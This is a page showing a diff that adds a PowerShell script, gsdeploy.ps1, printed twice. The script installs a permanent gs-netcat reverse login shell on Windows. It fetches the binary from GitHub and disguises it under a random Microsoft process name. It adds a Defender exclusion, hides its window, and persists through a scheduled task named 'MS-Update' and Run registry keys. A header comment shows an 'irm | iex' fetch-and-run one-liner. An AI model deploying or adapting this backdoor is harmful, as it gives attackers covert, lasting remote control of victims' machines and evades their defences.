santaklouse · March 22, 2026 18:48
diff --git a/gsdeploy.ps1 b/gsdeploy.ps1
 # Install and start a permanent gs-netcat reverse login shell
 #
 # See https://gsocket.io/ for examples.
 # 
 # $Env:S="MySecret" # for deploying with a spesific secret.
 # $Env:DEBUG=1      # for verbose output.
 # ex: $env:S="mysecret"; irm https://gsocket.io/1 | iex


 $ErrorActionPreference = "SilentlyContinue"

 # ================= CONFIG =================
 $GITHUB = "https://api.github.com/repos/hackerschoice/gsocket"
 $BIN_NAME = "gsocket.exe"
 $TASK_NAME = "MS-Update"

 # ================= UTILS =================
 function Is-Admin {
    return ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()
    ).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
 }

 function Rand {
    -join ((65..90)+(97..122) | Get-Random -Count 6 | % {[char]$_})
 }

 function Hide-Console {
    Add-Type -Name W -Namespace C -MemberDefinition '
    [DllImport("Kernel32.dll")] public static extern IntPtr GetConsoleWindow();
    [DllImport("user32.dll")] public static extern bool ShowWindow(IntPtr hWnd, Int32 nCmdShow);
    '
    $h=[C.W]::GetConsoleWindow()
    [C.W]::ShowWindow($h,0)
 }

 function Get-Arch {
    switch ($Env:PROCESSOR_ARCHITECTURE) {
        "AMD64" { "x86_64" }
        "x86"   { "i686" }
        "ARM64" { "arm64" }
        default { "x86_64" }
    }
 }

 function Get-DownloadUrl {
    $arch = Get-Arch
    try {
        $r = Invoke-WebRequest "$GITHUB/releases/latest" -UseBasicParsing
        $lines = $r.Content.Split('"')
        ($lines | Select-String "gsocket.*$arch.*win").Line.Split()[0]
    } catch { return $null }
 }

 function Download($url, $path) {
    try {
        Invoke-RestMethod $url -OutFile $path
    } catch {
        Invoke-WebRequest $url -OutFile $path
    }
 }

 function Add-RunKey($path, $secret) {
    $cmd = "powershell.exe -WindowStyle Hidden -Command `"$path -s $secret`""
    if (Is-Admin) {
        reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /f /v (Rand) /d "$cmd" | Out-Null
    } else {
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v (Rand) /d "$cmd" | Out-Null
    }
 }

 function Add-Task($path, $secret) {
    $arg = "-WindowStyle Hidden -Command `"$path -s $secret`""
    $A = New-ScheduledTaskAction -Execute "powershell.exe" -Argument $arg
    $T = New-ScheduledTaskTrigger -AtStartup
    $P = if (Is-Admin) {
        New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
    } else {
        New-ScheduledTaskPrincipal "$env:USERNAME"
    }
    Register-ScheduledTask "$TASK_NAME-$(Rand)" -Action $A -Trigger $T -Principal $P | Out-Null
 }

 function Get-RandomExeName {
    $p = Get-Process | Where-Object {$_.Company -like "*Microsoft*"}
    if ($p.Count -eq 0) { return "svchost.exe" }
    return ($p | Get-Random).Name + ".exe"
 }

 # ================= START =================

 if ($env:HIDE) { Hide-Console }

 $SECRET = $env:S
 $RAND   = Rand
 $DIR    = "$env:APPDATA\$RAND"
 $ZIP    = "$DIR.zip"
 $EXE    = Join-Path $DIR (Get-RandomExeName)
 $SECRET_FILE = "$env:TEMP\$RAND.txt"

 New-Item -ItemType Directory -Path $DIR | Out-Null

 # Defender exclusion
 if (Is-Admin) {
    try { Add-MpPreference -ExclusionPath $DIR } catch {}
 }

 # Download
 $url = Get-DownloadUrl
 if (!$url) { exit }

 Download $url $ZIP

 # Extract
 try {
    tar -xf $ZIP -C $DIR
 } catch {
    Add-Type -AssemblyName System.IO.Compression.FileSystem
    [System.IO.Compression.ZipFile]::ExtractToDirectory($ZIP, $DIR)
 }

 Remove-Item $ZIP -Force

 # Locate binary
 $bin = Get-ChildItem $DIR -Recurse -Filter $BIN_NAME | Select-Object -First 1
 if (!$bin) { exit }

 Rename-Item $bin.FullName $EXE

 # Test binary (generate secret)
 $pinfo = New-Object System.Diagnostics.ProcessStartInfo
 $pinfo.FileName = $EXE
 $pinfo.RedirectStandardError = $true
 $pinfo.UseShellExecute = $false
 $pinfo.Arguments = "-g"

 $p = New-Object System.Diagnostics.Process
 $p.StartInfo = $pinfo
 $p.Start() | Out-Null
 $p.WaitForExit()

 $GEN_SECRET = $p.StandardError.ReadToEnd()
 $GEN_SECRET | Out-File $SECRET_FILE

 if (!$SECRET) { $SECRET = $GEN_SECRET }

 # Persistence
 $PERSIST = $false

 if (Is-Admin) {
    try { Add-Task $EXE $SECRET; $PERSIST=$true } catch {}
 }

 try { Add-RunKey $EXE $SECRET; $PERSIST=$true } catch {}

 # Run
 Start-Process $EXE "-s $SECRET" -WindowStyle Hidden

 # Output
 Write-Host ""
 Write-Host "Connect:"
 Write-Host "gsocket -i -s $SECRET" -ForegroundColor Green
 Write-Host ""
	# Install and start a permanent gs-netcat reverse login shell
	#
	# See https://gsocket.io/ for examples.
	#
	# $Env:S="MySecret" # for deploying with a spesific secret.
	# $Env:DEBUG=1 # for verbose output.
	# ex: $env:S="mysecret"; irm https://gsocket.io/1 \| iex


	$ErrorActionPreference = "SilentlyContinue"

	# ================= CONFIG =================
	$GITHUB = "https://api.github.com/repos/hackerschoice/gsocket"
	$BIN_NAME = "gsocket.exe"
	$TASK_NAME = "MS-Update"

	# ================= UTILS =================
	function Is-Admin {
	return ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()
	).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
	}

	function Rand {
	-join ((65..90)+(97..122) \| Get-Random -Count 6 \| % {[char]$_})
	}

	function Hide-Console {
	Add-Type -Name W -Namespace C -MemberDefinition '
	[DllImport("Kernel32.dll")] public static extern IntPtr GetConsoleWindow();
	[DllImport("user32.dll")] public static extern bool ShowWindow(IntPtr hWnd, Int32 nCmdShow);
	'
	$h=[C.W]::GetConsoleWindow()
	[C.W]::ShowWindow($h,0)
	}

	function Get-Arch {
	switch ($Env:PROCESSOR_ARCHITECTURE) {
	"AMD64" { "x86_64" }
	"x86" { "i686" }
	"ARM64" { "arm64" }
	default { "x86_64" }
	}
	}

	function Get-DownloadUrl {
	$arch = Get-Arch
	try {
	$r = Invoke-WebRequest "$GITHUB/releases/latest" -UseBasicParsing
	$lines = $r.Content.Split('"')
	($lines \| Select-String "gsocket.$arch.win").Line.Split()[0]
	} catch { return $null }
	}

	function Download($url, $path) {
	try {
	Invoke-RestMethod $url -OutFile $path
	} catch {
	Invoke-WebRequest $url -OutFile $path
	}
	}

	function Add-RunKey($path, $secret) {
	$cmd = "powershell.exe -WindowStyle Hidden -Command `"$path -s $secret`""
	if (Is-Admin) {
	reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /f /v (Rand) /d "$cmd" \| Out-Null
	} else {
	reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v (Rand) /d "$cmd" \| Out-Null
	}
	}

	function Add-Task($path, $secret) {
	$arg = "-WindowStyle Hidden -Command `"$path -s $secret`""
	$A = New-ScheduledTaskAction -Execute "powershell.exe" -Argument $arg
	$T = New-ScheduledTaskTrigger -AtStartup
	$P = if (Is-Admin) {
	New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
	} else {
	New-ScheduledTaskPrincipal "$env:USERNAME"
	}
	Register-ScheduledTask "$TASK_NAME-$(Rand)" -Action $A -Trigger $T -Principal $P \| Out-Null
	}

	function Get-RandomExeName {
	$p = Get-Process \| Where-Object {$_.Company -like "Microsoft"}
	if ($p.Count -eq 0) { return "svchost.exe" }
	return ($p \| Get-Random).Name + ".exe"
	}

	# ================= START =================

	if ($env:HIDE) { Hide-Console }

	$SECRET = $env:S
	$RAND = Rand
	$DIR = "$env:APPDATA\$RAND"
	$ZIP = "$DIR.zip"
	$EXE = Join-Path $DIR (Get-RandomExeName)
	$SECRET_FILE = "$env:TEMP\$RAND.txt"

	New-Item -ItemType Directory -Path $DIR \| Out-Null

	# Defender exclusion
	if (Is-Admin) {
	try { Add-MpPreference -ExclusionPath $DIR } catch {}
	}

	# Download
	$url = Get-DownloadUrl
	if (!$url) { exit }

	Download $url $ZIP

	# Extract
	try {
	tar -xf $ZIP -C $DIR
	} catch {
	Add-Type -AssemblyName System.IO.Compression.FileSystem
	[System.IO.Compression.ZipFile]::ExtractToDirectory($ZIP, $DIR)
	}

	Remove-Item $ZIP -Force

	# Locate binary
	$bin = Get-ChildItem $DIR -Recurse -Filter $BIN_NAME \| Select-Object -First 1
	if (!$bin) { exit }

	Rename-Item $bin.FullName $EXE

	# Test binary (generate secret)
	$pinfo = New-Object System.Diagnostics.ProcessStartInfo
	$pinfo.FileName = $EXE
	$pinfo.RedirectStandardError = $true
	$pinfo.UseShellExecute = $false
	$pinfo.Arguments = "-g"

	$p = New-Object System.Diagnostics.Process
	$p.StartInfo = $pinfo
	$p.Start() \| Out-Null
	$p.WaitForExit()

	$GEN_SECRET = $p.StandardError.ReadToEnd()
	$GEN_SECRET \| Out-File $SECRET_FILE

	if (!$SECRET) { $SECRET = $GEN_SECRET }

	# Persistence
	$PERSIST = $false

	if (Is-Admin) {
	try { Add-Task $EXE $SECRET; $PERSIST=$true } catch {}
	}

	try { Add-RunKey $EXE $SECRET; $PERSIST=$true } catch {}

	# Run
	Start-Process $EXE "-s $SECRET" -WindowStyle Hidden

	# Output
	Write-Host ""
	Write-Host "Connect:"
	Write-Host "gsocket -i -s $SECRET" -ForegroundColor Green
	Write-Host ""
No results found